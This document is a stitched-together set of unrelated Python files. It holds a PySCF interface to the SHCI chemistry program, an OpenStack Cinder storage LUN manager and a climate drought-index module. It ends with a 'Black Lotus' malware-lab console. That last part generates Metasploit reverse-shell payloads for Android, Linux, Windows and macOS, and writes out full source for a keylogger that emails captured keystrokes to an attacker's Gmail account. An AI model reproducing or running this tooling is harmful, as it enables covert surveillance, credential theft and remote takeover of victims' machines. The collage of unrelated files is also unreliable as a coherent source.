'shci_SHCIRUNTIMEDIR', None) settings.MPIPREFIX = getattr(__config__, 'shci_MPIPREFIX', None) if settings.SHCIEXE is None: import sys sys.stderr.write('settings.py not found. Please create %s\n' % os.path.join(os.path.dirname(__file__), 'settings.py')) raise ImportError('settings.py not found') try: sys.path.append(os.path.dirname(settings.SHCIEXE)) from hc_client import HcClient except: pass # The default parameters in config file CONFIG = { 'system': 'chem', # Define the number of electrons and spin 'n_up': 0, 'n_dn': 0, 'eps_vars': [ 5e-5, # 2e-5, # 1e-5 ], 'eps_vars_schedule': [ 2e-3, 1e-3, 5e-4, 2e-4, 1e-4 ], 'chem': { # d2h and its subgroups, and Dooh 'point_group': 'C1' }, ## Error tol of PT energy. The variational energy error tol equals ## target_error/5000 # 'target_error': 1e-5, # ## Whether to compute density matrices # 'get_1rdm_csv': False, # 'get_2rdm_csv': False, # ## Variational calculation only, without perturbation correction # 'var_only' : False, # ## Set it for Green's function G+ # 'get_green' : False, # 'w_green' : -0.40, # frequency # 'n_green' : 0.01, # imaginary part to avoid divergence # ## set it for G- # 'adavanced' : False, } def cleanup(shciobj, remove_wf=False): files = ['1rdm.csv', '2rdm.csv', shciobj.configfile, shciobj.integralfile, shciobj.outputfile, 'integrals_cache.dat', 'result.json', ] if remove_wf: wfn_files = glob.glob(os.path.join(shciobj.runtimedir, 'wf_*')) files.extend(wfn_files) for f in files: if os.path.isfile(os.path.join(shciobj.runtimedir, f)): os.remove(os.path.join(shciobj.runtimedir, f)) class SHCI(lib.StreamObject): r'''SHCI program interface and object to hold SHCI program input parameters. See also the homepage of the SHCI program. https://github.com/jl2922/shci Attributes: Examples: ''' def __init__(self, mol=None, tol=None): self.mol = mol if mol is None: self.stdout = sys.stdout self.verbose = logger.NOTE else: self.stdout = mol.stdout self.verbose = mol.verbose self.executable = settings.SHCIEXE self.mpiprefix = settings.MPIPREFIX self.runtimedir = '.'#getattr(settings, 'SHCIRUNTIMEDIR', '.') self.configfile = 'config.json' # DO NOT modify self.integralfile = 'FCIDUMP' # DO NOT modify self.outputfile = 'output.dat' self.nroots = 1 self.conv_tol = tol self.config = copy.deepcopy(CONFIG) # TODO: Organize into pyscf and SHCI parameters self.restart = False self.spin = None if mol is not None and mol.symmetry: self.groupname = mol.groupname else: self.groupname = None self.dryrun = False ################################################## #DO NOT CHANGE these parameters, unless you know the code in details self.orbsym = [] self._keys = set(self.__dict__.keys()) def dump_flags(self, verbose=None): log = logger.new_logger(self, verbose) log.info('') log.info('******** SHCI flags ********') log.info('executable = %s', self.executable) log.info('mpiprefix = %s', self.mpiprefix) log.info('runtimedir = %s', self.runtimedir) log.debug1('config = %s', self.config) log.info('') return self def make_rdm1(self, state, norb, nelec, **kwargs): dm_file = os.path.join(self.runtimedir, '1rdm.csv') if not ('get_1rdm_csv' in self.config and os.path.isfile(dm_file) and os.path.isfile(get_wfn_file(self, state))): write_config(self, nelec, {'get_1rdm_csv': True, 'load_integrals_cache': True}) execute_shci(self) i, j, val = numpy.loadtxt(dm_file, dtype=numpy.dtype('i,i,d'), delimiter=',', skiprows=1, unpack=True) rdm1 = numpy.zeros((norb,norb)) rdm1[i,j] = rdm1[j,i] = val return rdm1 def make_rdm1s(self, state, norb, nelec, **kwargs): # Ref: IJQC, 109, 3552 Eq (3) if isinstance(nelec, (int, numpy.integer)): nelecb = (nelec-self.spin) // 2 neleca = nelec - nelecb else : neleca, nelecb = nelec dm1, dm2 = self.make_rdm12(state, norb, nelec, **kwargs) dm1n = (2-(neleca+nelecb)/2.) * dm1 - numpy.einsum('pkkq->pq', dm2) dm1n *= 1./(neleca-nelecb+1) dm1a, dm1b = (dm1+dm1n)*.5, (dm1-dm1n)*.5 return dm1a, dm1b def make_rdm12(self, state, norb, nelec, **kwargs): dm_file = os.path.join(self.runtimedir, '2rdm.csv') if not ('get_2rdm_csv' in self.config and os.path.isfile(dm_file) and os.path.isfile(get_wfn_file(self, state))): write_config(self, nelec, {'get_2rdm_csv': True, 'load_integrals_cache': True}) execute_shci(self) # two_rdm is dumped as # for (unsigned p = 0; p < n_orbs; p++) # for (unsigned q = p; q < n_orbs; q++) # for (unsigned s = 0; s < n_orbs; s++) # for (unsigned r = 0; r < n_orbs; r++) { # if (p == q && s > r) continue; # const double rdm_pqrs = two_rdm[combine4_2rdm(p, q, r, s, n_orbs)]; # if (std::abs(rdm_pqrs) < 1.0e-9) continue; # fprintf(pFile, "%d,%d,%d,%d,%#.15g\n", p, q, r, s, rdm_pqrs); } i, j, k, l, val = numpy.loadtxt(dm_file, dtype=numpy.dtype('i,i,i,i,d'), delimiter=',', skiprows=1, unpack=True) rdm2 = numpy.zeros((norb,norb,norb,norb)) rdm2[i,j,k,l] = rdm2[j,i,l,k] = val # convert rdm2 to the pyscf convention rdm2 = rdm2.transpose(0,3,1,2) if isinstance(nelec, (int, numpy.integer)): nelectrons = nelec else: nelectrons = nelec[0] + nelec[1] rdm1 = numpy.einsum('ikjj->ki', rdm2) / (nelectrons - 1) return rdm1, rdm2 def kernel(self, h1e, eri, norb, nelec, ci0=None, ecore=0, restart=None, **kwargs): if restart is None: restart = self.restart state_id = min(self.config['eps_vars']) if restart or ci0 is not None: if self.verbose >= logger.DEBUG1: logger.debug1(self, 'restart was set. wf is read from wf_eps* file.') self.cleanup(remove_wf=False) wfn_file = get_wfn_file(self, state_id) if os.path.isfile(wfn_file): shutil.move(wfn_file, get_wfn_file(self, state_id * 2)) else: self.cleanup(remove_wf=True) if 'orbsym' in kwargs: self.orbsym = kwargs['orbsym'] writeIntegralFile(self, h1e, eri, norb, nelec, ecore) conf = {} if 'tol' in kwargs: conf['tol'] = kwargs['tol'] write_config(self, nelec, conf) if self.dryrun: logger.info(self, 'Only write integrals and config') if self.nroots == 1: calc_e = 0.0 roots = '' else : calc_e = [0.0] * self.nroots roots = [''] * self.nroots return calc_e, roots if self.nroots != 1: raise NotImplementedError execute_shci(self) if self.verbose >= logger.DEBUG1: with open(os.path.join(self.runtimedir, self.outputfile), 'r') as f: self.stdout.write(f.read()) calc_e = read_energy(self) # Each eps_vars is associated to one approximate wfn. roots = state_id = min(self.config['eps_vars']) if not os.path.isfile(get_wfn_file(self, state_id)): raise RuntimeError('Eigenstate %s not found' % get_wfn_file(self, state_id)) return calc_e, roots def approx_kernel(self, h1e, eri, norb, nelec, ci0=None, ecore=0, restart=None, **kwargs): if restart is None: restart = self.restart state_id = min(self.config['eps_vars']) if restart or ci0 is not None: self.cleanup(remove_wf=False) wfn_file = get_wfn_file(self, state_id) if os.path.isfile(wfn_file): shutil.move(wfn_file, get_wfn_file(self, state_id * 2)) else: self.cleanup(remove_wf=True) if 'orbsym' in kwargs: self.orbsym = kwargs['orbsym'] writeIntegralFile(self, h1e, eri, norb, nelec, ecore) # approx_kernel is called by CASSCF solver only. 2pdm is always needed. conf = {'get_2rdm_csv': True} if 'tol' in kwargs: conf['tol'] = kwargs['tol'] else: conf['tol'] = self.conv_tol * 1e3 write_config(self, nelec, conf) execute_shci(self) if self.verbose >= logger.DEBUG1: with open(os.path.join(self.runtimedir, self.outputfile), 'r') as f: self.stdout.write(f.read()) calc_e = read_energy(self) # Each eps_vars is associated to one approximate wfn. roots = state_id = min(self.config['eps_vars']) if not os.path.isfile(get_wfn_file(self, state_id)): raise RuntimeError('Eigenstate %s not found' % get_wfn_file(self, state_id)) return calc_e, roots def spin_square(self, civec, norb, nelec): state_id = civec if not ('s2' in self.config and os.path.isfile(get_wfn_file(self, state_id))): write_config(self, nelec, {'s2': True, 'load_integrals_cache': True}) execute_shci(self) result = get_result(self) ss = result['s2'] s = numpy.sqrt(ss+.25) - .5 return ss, s*2+1 def contract_2e(self, eri, civec, norb, nelec, client=None, **kwargs): if client is None: if getattr(self, '_client', None): if not (os.path.isfile(os.path.join(self.runtimedir, self.integralfile)) and os.path.isfile(os.path.join(self.runtimedir, self.configfile))): raise RuntimeError('FCIDUMP or config.json not found') self._client = HcClient(nProcs=1, shciPath=self.executable, runtimePath=self.runtimedir) client.startServer() client = self._client else: self._client = client return client.Hc(civec) cleanup = cleanup def write_config(shciobj, nelec, config): conf = shciobj.config.copy() if isinstance(nelec, (int, numpy.integer)): if shciobj.spin is None: nelecb = nelec // 2 else: nelecb = (nelec - shciobj.spin) // 2 neleca = nelec - nelecb else : neleca, nelecb = nelec conf['n_up'] = neleca conf['n_dn'] = nelecb if shciobj.groupname is not None: conf['chem']['point_group'] = shciobj.groupname if shciobj.conv_tol is not None: conf['target_error'] = shciobj.conv_tol * 5000 conf.update(config) if config.get('tol', None) is not None: conf['target_error'] = config['tol'] * 5000 with open(os.path.join(shciobj.runtimedir, shciobj.configfile), 'w') as f: json.dump(conf, f, indent=2) def writeIntegralFile(shciobj, h1eff, eri_cas, ncas, nelec, ecore=0): if isinstance(nelec, (int, numpy.integer)): if shciobj.spin is None: nelecb = nelec // 2 else: nelecb = (nelec - shciobj.spin) // 2 neleca = nelec - nelecb else : neleca, nelecb = nelec if shciobj.groupname is not None and shciobj.orbsym is not []: # First removing the symmetry
<filename>cinder/volume/drivers/violin/vxg/vshare/lun.py #!/usr/bin/env python # vim: tabstop=4 shiftwidth=4 softtabstop=4 # Copyright 2013 Violin Memory, Inc. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from cinder.volume.drivers.violin.vxg.core.node import XGNode from cinder.volume.drivers.violin.vxg.core.error import * """ Here's an example of how to extend the functionality in this module: class LUNManager_3(LUNManager_2): def __init__(self, basic): super(LUNManager_3, self).__init__(basic) def new_function(self, *args): pass """ class LUNManager(object): def __init__(self, basic): self._basic = basic def create_lun(self, container, name, size, quantity, nozero, thin, readonly, startnum, blksize=None): """Create a LUN. Arguments: container -- string name -- string size -- string quantity -- uint64 nozero -- string thin -- string readonly -- string startnum -- uint64 blksize -- uint32 (optional) Returns: Action result as a dict. """ nodes = [] nodes.append(XGNode('container', 'string', container)) nodes.append(XGNode('name', 'string', name)) nodes.append(XGNode('size', 'string', size)) nodes.append(XGNode('quantity', 'uint64', quantity)) nodes.append(XGNode('nozero', 'string', nozero)) nodes.append(XGNode('thin', 'string', thin)) nodes.append(XGNode('readonly', 'string', readonly)) nodes.append(XGNode('action', 'string', 'c')) nodes.append(XGNode('startnum', 'uint64', startnum)) if blksize is not None: nodes.append(XGNode('blksize', 'uint32', blksize)) return self._basic.perform_action('/vshare/actions' + '/lun/create', nodes) def bulk_delete_luns(self, container, luns): """Delete one or more LUNs. Arguments: container -- string luns -- string (string or list) Returns: Action result as a dict. """ nodes = [] nodes.append(XGNode('container', 'string', container)) nodes.extend(XGNode.as_node_list('lun/{0}', 'string', luns)) return self._basic.perform_action('/vshare/actions' + '/lun/bulk_delete', nodes) def export_lun(self, container, name, ports, initiators, lun_id): """Export a LUN. Arguments: container -- string name -- string ports -- string initiators -- string lun_id -- int16 Returns: Action result as a dict. """ return self._lun_export(container, name, ports, initiators, lun_id, False) def unexport_lun(self, container, name, ports, initiators, lun_id): """Unexport a LUN. Arguments: container -- string name -- string ports -- string initiators -- string lun_id -- int16 Returns: Action result as a dict. """ return self._lun_export(container, name, ports, initiators, lun_id, True) # Begin internal functions def _lun_export(self, container, name, ports, initiators, lun_id, unexport): """Internal work function for: export_lun unexport_lun """ nodes = [] nodes.append(XGNode('container', 'string', container)) nodes.append(XGNode('name', 'string', name)) nodes.append(XGNode('initiators', 'string', initiators)) nodes.append(XGNode('ports', 'string', ports)) if lun_id == 'auto': nodes.append(XGNode('lun_id', 'int16', -1)) else: nodes.append(XGNode('lun_id', 'int16', lun_id)) nodes.append(XGNode('unexport', 'bool', unexport)) return self._basic.perform_action('/vshare/actions' + '/lun/export', nodes) class LUNManager_1(LUNManager): def __init__(self, basic): super(LUNManager_1, self).__init__(basic) def export_lun(self, container, names, ports, initiators, lun_id): """Export a LUN. Arguments: container -- string names -- string (string or list) ports -- string (string or list) initiators -- string (string or list) lun_id -- int16 Returns: Action result as a dict. """ return self._lun_export(container, names, ports, initiators, lun_id, False) def unexport_lun(self, container, names, ports, initiators, lun_id): """Unexport a LUN. Arguments: container -- string names -- string (string or list) ports -- string (string or list) initiators -- string (string or list) lun_id -- int16 Returns: Action result as a dict. """ return self._lun_export(container, names, ports, initiators, lun_id, True) # Begin internal functions def _lun_export(self, container, names, ports, initiators, lun_id, unexport): """Internal work function for: export_lun unexport_lun """ nodes = [] nodes.append(XGNode('container', 'string', container)) nodes.extend(XGNode.as_node_list('names/{0}', 'string', names)) nodes.extend(XGNode.as_node_list('initiators/{0}', 'string', initiators)) nodes.extend(XGNode.as_node_list('ports/{0}', 'string', ports)) if lun_id == 'auto': nodes.append(XGNode('lun_id', 'int16', -1)) else: nodes.append(XGNode('lun_id', 'int16', lun_id)) nodes.append(XGNode('unexport', 'bool', unexport)) return self._basic.perform_action('/vshare/actions' + '/lun/export', nodes) class LUNManager_2(LUNManager_1): def __init__(self, basic): super(LUNManager_2, self).__init__(basic) def set(self, container, lun, read_only, port_A, port_B): """Perform LUN modification. Arguments: container -- string lun -- string read_only -- bool port_A -- bool port_B -- bool Returns: Action result as a dict. """ nodes = [] nodes.append(XGNode('container', 'string', container)) nodes.append(XGNode('lun', 'string', lun)) nodes.append(XGNode('read_only', 'bool', read_only)) nodes.append(XGNode('port_A', 'bool', port_A)) nodes.append(XGNode('port_B', 'bool', port_B)) return self._basic.perform_action('/vshare/actions' + '/lun/set', nodes) def rename_lun(self, container, lun_old, lun_new): """Rename a LUN. Arguments: container -- string lun_old -- string lun_new -- string Returns: Action result as a dict. """ nodes = [] nodes.append(XGNode('container', 'string', container)) nodes.append(XGNode('lun_old', 'string', lun_old)) nodes.append(XGNode('lun_new', 'string', lun_new)) return self._basic.perform_action('/vshare/actions' + '/lun/rename', nodes) class LUNManager_3(LUNManager_2): def __init__(self, basic): super(LUNManager_3, self).__init__(basic) def create_lun_group(self, container, name, lun_names, description=None): """Create a LUN group. Arguments: container -- string name -- string lun_names -- string (string or list) description -- string (optional) Returns: Action result as a dict. """ return self._lungroup_create(container, name, lun_names, 'create', description) def delete_lun_group(self, container, name): """Deletes a LUN group. Arguments: container -- string name -- string Returns: Action result as a dict. """ return self._lungroup_create(container, name, None, 'delete', None) def _lungroup_create(self, container, name, lun_names, action, description): """Internal work function for: create_lun_group delete_lun_group """ nodes = [] nodes.append(XGNode('container', 'string', container)) nodes.append(XGNode('name', 'string', name)) nodes.extend(XGNode.as_node_list('lun_names/{0}', 'string', lun_names)) nodes.append(XGNode('action', 'string', action)) if description is not None: nodes.append(XGNode('description', 'string', description)) return self._basic.perform_action('/vshare/actions/vdm' + '/lungroup/create', nodes) def add_to_lun_group(self, container, name, lun_names=None, new_name=None, description=None): """Update a LUN group and add LUNs. Arguments: container -- string name -- string lun_names -- string (string or list, optional) new_name -- string (optional) description -- string (optional) Returns: Action result as a dict. """ return self._lungroup_update(container, name, new_name, lun_names, False, description) def remove_from_lun_group(self, container, name, lun_names=None, new_name=None, description=None): """Update a LUN group and remove LUNs. Arguments: container -- string name -- string lun_names -- string (string or list, optional) new_name -- string (optional) description -- string Returns: Action result as a dict. """ return self._lungroup_update(container, name, new_name, lun_names, True, description) def _lungroup_update(self, container, name, new_name, lun_names, remove, description): """Internal work function for: add_to_lun_group remove_from_lun_group """ nodes = [] nodes.append(XGNode('container', 'string', container)) nodes.append(XGNode('name', 'string', name)) if new_name is not None: nodes.append(XGNode('new_name', 'string', new_name)) nodes.extend(XGNode.as_node_list('lun_names/{0}', 'string', lun_names)) if remove is not None: nodes.append(XGNode('remove', 'bool', remove)) if description is not None: nodes.append(XGNode('description', 'string', description)) return self._basic.perform_action('/vshare/actions/vdm' + '/lungroup/update', nodes) def export_lun_group(self, container, name, initiators, ports): """Exports a LUN group. Arguments: container -- string name -- string initiators -- string (string or list) ports -- string (string or list) Returns: Action result as a dict. """ return self._lungroup_export(container, name, initiators, ports, False) def unexport_lun_group(self, container, name, initiators, ports): """Unexports a LUN group. Arguments: container -- string name -- string initiators -- string (string or list) ports -- string (string or list) Returns: Action result as a dict. """ return self._lungroup_export(container, name, initiators, ports, True) def _lungroup_export(self, container, name, initiators, ports, unexport): """Internal work function for: export_lun_group unexport_lun_group """ nodes = [] nodes.append(XGNode('container', 'string', container)) nodes.append(XGNode('name', 'string', name)) nodes.extend(XGNode.as_node_list('initiators/{0}', 'string', initiators)) nodes.extend(XGNode.as_node_list('ports/{0}', 'string', ports)) nodes.append(XGNode('unexport', 'bool', unexport)) return self._basic.perform_action('/vshare/actions/vdm' + '/lungroup/export', nodes) def create_lun(self, container, name, size, quantity, nozero, thin, readonly, startnum, blksize=None, naca=None, alua=None, preferredport=None): """Create a LUN. Arguments: container -- string name -- string size -- string quantity -- uint64 nozero -- string thin -- string readonly -- string startnum -- uint64 blksize -- uint32 (optional) naca -- bool (optional) alua -- bool (optional) preferredport -- uint8 (optional) Returns: Action result as a dict. """ nodes = [] nodes.append(XGNode('container', 'string', container)) nodes.append(XGNode('name', 'string', name)) nodes.append(XGNode('size', 'string', size)) nodes.append(XGNode('quantity', 'uint64', quantity)) nodes.append(XGNode('nozero', 'string', nozero)) nodes.append(XGNode('thin', 'string', thin)) nodes.append(XGNode('readonly', 'string', readonly)) nodes.append(XGNode('action', 'string', 'c')) nodes.append(XGNode('startnum', 'uint64', startnum)) if blksize is not None: nodes.append(XGNode('blksize', 'uint32', blksize)) if naca is not None: nodes.append(XGNode('naca', 'bool', naca)) if alua is not None: nodes.append(XGNode('alua', 'bool', alua)) if preferredport is not None: nodes.append(XGNode('preferredport', 'uint8', preferredport)) return self._basic.perform_action('/vshare/actions' + '/lun/create', nodes) def resize_lun(self, container, name, size): """ Resize a LUN. Arguments: container -- string name -- string size -- string Returns: Action result as a dict. """ nodes = [] nodes.append(XGNode('container', 'string', container)) nodes.append(XGNode('lun', 'string', name)) nodes.append(XGNode('lun_new_size', 'string', size)) return self._basic.perform_action('/vshare/actions' + '/lun/resize', nodes) def set(self, container, lun=None, read_only=None, port_A=None, port_B=None, devid=None, naca=None, alua=None, preferredport=None, encrypted=None, threshold_type=None, threshold_hard_val=None, threshold_soft_val=None): """Perform LUN modification. Arguments: container -- string lun -- string (optional) read_only -- bool (optional) port_A -- bool (optional) port_B -- bool (optional) devid -- string (optional) naca -- bool (optional) alua -- bool (optional) preferredport -- uint8 (optional) encrypted -- bool (optional) threshold_type --
<reponame>haysengithub/climate_indices import logging import numba import numpy as np from enum import Enum from climate_indices import compute, eto, palmer, utils # declare the names that should be included in the public API for this module __all__ = ["pdsi", "percentage_of_normal", "pet", "scpdsi", "spei", "spi"] # ---------------------------------------------------------------------------------------------------------------------- class Distribution(Enum): """ Enumeration type for distribution fittings used for SPI and SPEI. """ pearson = "pearson" gamma = "gamma" # ---------------------------------------------------------------------------------------------------------------------- # set up a basic, global _logger logging.basicConfig( level=logging.DEBUG, format="%(asctime)s %(levelname)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S", ) _logger = logging.getLogger(__name__) # ---------------------------------------------------------------------------------------------------------------------- # valid upper and lower bounds for indices that are fitted/transformed to a distribution (SPI and SPEI) _FITTED_INDEX_VALID_MIN = -3.09 _FITTED_INDEX_VALID_MAX = 3.09 # ---------------------------------------------------------------------------------------------------------------------- @numba.jit def spi( values, scale, distribution, data_start_year, calibration_year_initial, calibration_year_final, periodicity, ): """ Computes SPI (Standardized Precipitation Index). :param values: 1-D numpy array of precipitation values, in any units, first value assumed to correspond to January of the initial year if the periodicity is monthly, or January 1st of the initial year if daily :param scale: number of time steps over which the values should be scaled before the index is computed :param distribution: distribution type to be used for the internal fitting/transform computation :param data_start_year: the initial year of the input precipitation dataset :param calibration_year_initial: initial year of the calibration period :param calibration_year_final: final year of the calibration period :param periodicity: the periodicity of the time series represented by the input data, valid/supported values are 'monthly' and 'daily' 'monthly' indicates an array of monthly values, assumed to span full years, i.e. the first value corresponds to January of the initial year and any missing final months of the final year filled with NaN values, with size == # of years * 12 'daily' indicates an array of full years of daily values with 366 days per year, as if each year were a leap year and any missing final months of the final year filled with NaN values, with array size == (# years * 366) :return SPI values fitted to the gamma distribution at the specified time step scale, unitless :rtype: 1-D numpy.ndarray of floats of the same length as the input array of precipitation values """ # we expect to operate upon a 1-D array, so if we've been passed a 2-D array we flatten it, otherwise raise an error shape = values.shape if len(shape) == 2: values = values.flatten() elif len(shape) != 1: message = "Invalid shape of input array: {0} -- only 1-D and 2-D arrays are supported".format( shape ) _logger.error(message) raise ValueError(message) # if we're passed all missing values then we can't compute anything, return the same array of missing values if (np.ma.is_masked(values) and values.mask.all()) or np.all(np.isnan(values)): return values # remember the original length of the array, in order to facilitate returning an array of the same size original_length = values.size # get a sliding sums array, with each time step's value scaled by the specified number of time steps values = compute.sum_to_scale(values, scale) # reshape precipitation values to (years, 12) for monthly, or to (years, 366) for daily if periodicity is compute.Periodicity.monthly: values = utils.reshape_to_2d(values, 12) elif periodicity is compute.Periodicity.daily: values = utils.reshape_to_2d(values, 366) else: raise ValueError("Invalid periodicity argument: %s" % periodicity) if distribution is Distribution.gamma: # fit the scaled values to a gamma distribution and transform to corresponding normalized sigmas values = compute.transform_fitted_gamma( values, data_start_year, calibration_year_initial, calibration_year_final, periodicity, ) elif distribution is Distribution.pearson: # fit the scaled values to a Pearson Type III distribution and transform to corresponding normalized sigmas values = compute.transform_fitted_pearson( values, data_start_year, calibration_year_initial, calibration_year_final, periodicity, ) else: message = "Unsupported distribution argument: {dist}".format(dist=distribution) _logger.error(message) raise ValueError(message) # clip values to within the valid range, reshape the array back to 1-D values = np.clip(values, _FITTED_INDEX_VALID_MIN, _FITTED_INDEX_VALID_MAX).flatten() # return the original size array return values[0:original_length] # ---------------------------------------------------------------------------------------------------------------------- @numba.jit def spei( precips_mm, pet_mm, scale, distribution, periodicity, data_start_year, calibration_year_initial, calibration_year_final, ): """ Compute SPEI fitted to the gamma distribution. PET values are subtracted from the precipitation values to come up with an array of (P - PET) values, which is then scaled to the specified months scale and finally fitted/transformed to SPEI values corresponding to the input precipitation time series. :param precips_mm: an array of monthly total precipitation values, in millimeters, should be of the same size (and shape?) as the input temperature array :param pet_mm: an array of monthly PET values, in millimeters, should be of the same size (and shape?) as the input precipitation array :param scale: the number of months over which the values should be scaled before computing the indicator :param distribution: distribution type to be used for the internal fitting/transform computation :param periodicity: the periodicity of the time series represented by the input data, valid/supported values are 'monthly' and 'daily' 'monthly' indicates an array of monthly values, assumed to span full years, i.e. the first value corresponds to January of the initial year and any missing final months of the final year filled with NaN values, with size == # of years * 12 'daily' indicates an array of full years of daily values with 366 days per year, as if each year were a leap year and any missing final months of the final year filled with NaN values, with array size == (# years * 366) :param data_start_year: the initial year of the input datasets (assumes that the two inputs cover the same period) :param calibration_year_initial: initial year of the calibration period :param calibration_year_final: final year of the calibration period :return: an array of SPEI values :rtype: numpy.ndarray of type float, of the same size and shape as the input temperature and precipitation arrays """ # if we're passed all missing values then we can't compute anything, return the same array of missing values if (np.ma.is_masked(precips_mm) and precips_mm.mask.all()) or np.all( np.isnan(precips_mm) ): return precips_mm # validate that the two input arrays are compatible if precips_mm.size != pet_mm.size: message = "Incompatible precipitation and PET arrays" _logger.error(message) raise ValueError(message) # subtract the PET from precipitation, adding an offset to ensure that all values are positive p_minus_pet = (precips_mm.flatten() - pet_mm.flatten()) + 1000.0 # remember the original length of the input array, in order to facilitate returning an array of the same size original_length = precips_mm.size # get a sliding sums array, with each element's value scaled by the specified number of time steps scaled_values = compute.sum_to_scale(p_minus_pet, scale) if distribution is Distribution.gamma: # fit the scaled values to a gamma distribution and transform to corresponding normalized sigmas transformed_fitted_values = compute.transform_fitted_gamma( scaled_values, data_start_year, calibration_year_initial, calibration_year_final, periodicity, ) elif distribution is Distribution.pearson: # fit the scaled values to a Pearson Type III distribution and transform to corresponding normalized sigmas transformed_fitted_values = compute.transform_fitted_pearson( scaled_values, data_start_year, calibration_year_initial, calibration_year_final, periodicity, ) else: message = "Unsupported distribution argument: {dist}".format(dist=distribution) _logger.error(message) raise ValueError(message) # clip values to within the valid range, reshape the array back to 1-D values = np.clip( transformed_fitted_values, _FITTED_INDEX_VALID_MIN, _FITTED_INDEX_VALID_MAX ).flatten() # return the original size array return values[0:original_length] # ---------------------------------------------------------------------------------------------------------------------- @numba.jit def scpdsi( precip_time_series, pet_time_series, awc, data_start_year, calibration_start_year, calibration_end_year, ): """ This function computes the self-calibrated Palmer Drought Severity Index (scPDSI), Palmer Drought Severity Index (PDSI), Palmer Hydrological Drought Index (PHDI), Palmer Modified Drought Index (PMDI), and Palmer Z-Index. :param precip_time_series: time series of precipitation values, in inches :param pet_time_series: time series of PET values, in inches :param awc: available water capacity (soil constant), in inches :param data_start_year: initial year of the input precipitation and PET datasets, both of which are assumed to start in January of this year :param calibration_start_year: initial year of the calibration period :param calibration_end_year: final year of the calibration period :return: five numpy arrays containing SCPDSI, PDSI, PHDI, PMDI, and Z-Index values respectively """ return palmer.scpdsi( precip_time_series, pet_time_series, awc, data_start_year, calibration_start_year, calibration_end_year, ) # ---------------------------------------------------------------------------------------------------------------------- @numba.jit def pdsi( precip_time_series, pet_time_series, awc, data_start_year, calibration_start_year, calibration_end_year, ): """ This function computes the Palmer Drought Severity Index (PDSI), Palmer Hydrological Drought Index (PHDI), and Palmer Z-Index. :param precip_time_series: time series of monthly precipitation
payload_location = "NOT SET" link_true_false="False" def help(): os.system('cls||clear') print("""\033[37m ============================== \033[31mMalware Lab Panel\033[37m ============================== \033[31mCore Commands\033[37m set payload 'number' Set the specific payload to generate, #Example: set payload 1 set lhost Set custom local ip that you want the payload to listen |_You can see your local ip by typing 'lhost' lhost Auto set lhost of your machine set lport Set the port that you want the payload to listen set name Set the payload name set location Set the location that the payload will be stored |_If you choose 'set location', you are not allowed to use link link (NON supported yet) Generate the payload as a link(only in local network) |_If you choose link, you are not allowed to use 'set location' config see the payload configuration listener start a listener compile Generate the payload command ( use 'config' to see your payload ) \033[31mMSF Payloads\033[37m (Use Metasploit to create \033[31mReverse Shell\033[37m payloads\033[37m) \033[31m[=============================================================>\033[37m [\033[31m1\033[37m]Android \033[33m|\033[37m [\033[31m2\033[37m]Linux \033[33m|\033[37m [\033[31m3\033[37m] Windows \033[33m|\033[37m [\033[31m4\033[37m] Mac OS X \033[33m|\033[37m [\033[31m5\033[37m] Python \033[33m|\033[37m [\033[31m6\033[37m] Bash \033[31mCustom Payloads \033[37m(You dont need msfvenom to create \033[31mReverse Shell\033[37m payloads\033[37m) \033[31m[=============================================================>\033[37m [\033[31m7\033[37m] Windows C# (undetectable) [\033[31m8\033[37m] Keylogger (Only requires email and password for your smtp gmail server) """) help() lab = True while lab: def keylogger(): email = input("\033[37mEmail > \033[31m") password = input("\033[37mPassword > \033[31m") name = input("\033[37mFile Name > \033[31m") code1 = (r""" import keyboard import smtplib from threading import Timer from datetime import datetime SEND_REPORT_EVERY = 20 """) email_1 = str("EMAIL_ADDRESS = '" + email + "' ") password_1 = str("EMAIL_PASSWORD = '" + password + "' ") code2 = str(r""" class Keylogger: def __init__(self, interval, report_method="email"): self.interval = interval self.report_method = report_method self.log = "" self.start_dt = datetime.now() self.end_dt = datetime.now() def callback(self, event): name = event.name if len(name) > 1: if name == "space": name = " " elif name == "enter": name = "[ENTER]\n" elif name == "decimal": name = "." else: name = name.replace(" ", "_") name = f"[{name.upper()}]" self.log += name def update_filename(self): start_dt_str = str(self.start_dt)[:-7].replace(" ", "-").replace(":", "") end_dt_str = str(self.end_dt)[:-7].replace(" ", "-").replace(":", "") self.filename = f"keylog-{start_dt_str}_{end_dt_str}" def report_to_file(self): with open(f"{self.filename}.txt", "w") as f: print(self.log, file=f) print(f"[+] Saved {self.filename}.txt") def sendmail(self, email, password, message): server = smtplib.SMTP(host="smtp.gmail.com", port=587) server.starttls() server.login(email, password) server.sendmail(email, email, message) server.quit() def report(self): if self.log: self.end_dt = datetime.now() self.update_filename() if self.report_method == "email": self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log) elif self.report_method == "file": self.report_to_file() self.start_dt = datetime.now() self.log = "" timer = Timer(interval=self.interval, function=self.report) timer.daemon = True timer.start() def start(self): self.start_dt = datetime.now() keyboard.on_release(callback=self.callback) self.report() keyboard.wait() if __name__ == "__main__": keylogger = Keylogger(interval=SEND_REPORT_EVERY, report_method="file") keylogger.start() """) code_mal = str(code1 + "\n" + email_1 + "\n" + password_1 + "\n" + code2) keylogger_rev=open(name + ".py","w+") keylogger_rev.write(code_mal) keylogger_rev.close() print(str("Malware ready: \033[31m" + name + ".py\033[37m")) file_name_byte = str(name +".py") file_stats = os.stat(file_name_byte) print("File size: ", file_stats.st_size, " bytes!") a = input("\033[31mBlack Lotus\033[37m(\033[31mMalware Lab\033[37m) \033[31m>\033[37m ") #-------------------------------------------------------------------------------------------------------------- # PAYLOADS #-------------------------------------------------------------------------------------------------------------- if a == "set payload 1": payload = 'android/meterpreter/reverse_tcp' print("\033[37mPayload => \033[31m", payload) payload_os = 'Android' payload_extension='apk' #android payload elif a == "set payload 2": payload = 'linux/x86/meterpreter/reverse_tcp' print("\033[37mPayload => \033[31m", payload) payload_os='Linux' payload_extension='elf' #linux payload elif a == "set payload 3": payload = 'windows/meterpreter/reverse_tcp' print("\033[37mPayload => \033[31m", payload) payload_os='Windows' payload_extension='exe' #windows payload elif a == "set payload 4": payload = 'osx/x86/shell_reverse_tcp' print("\033[37mPayload => \033[31m", payload) 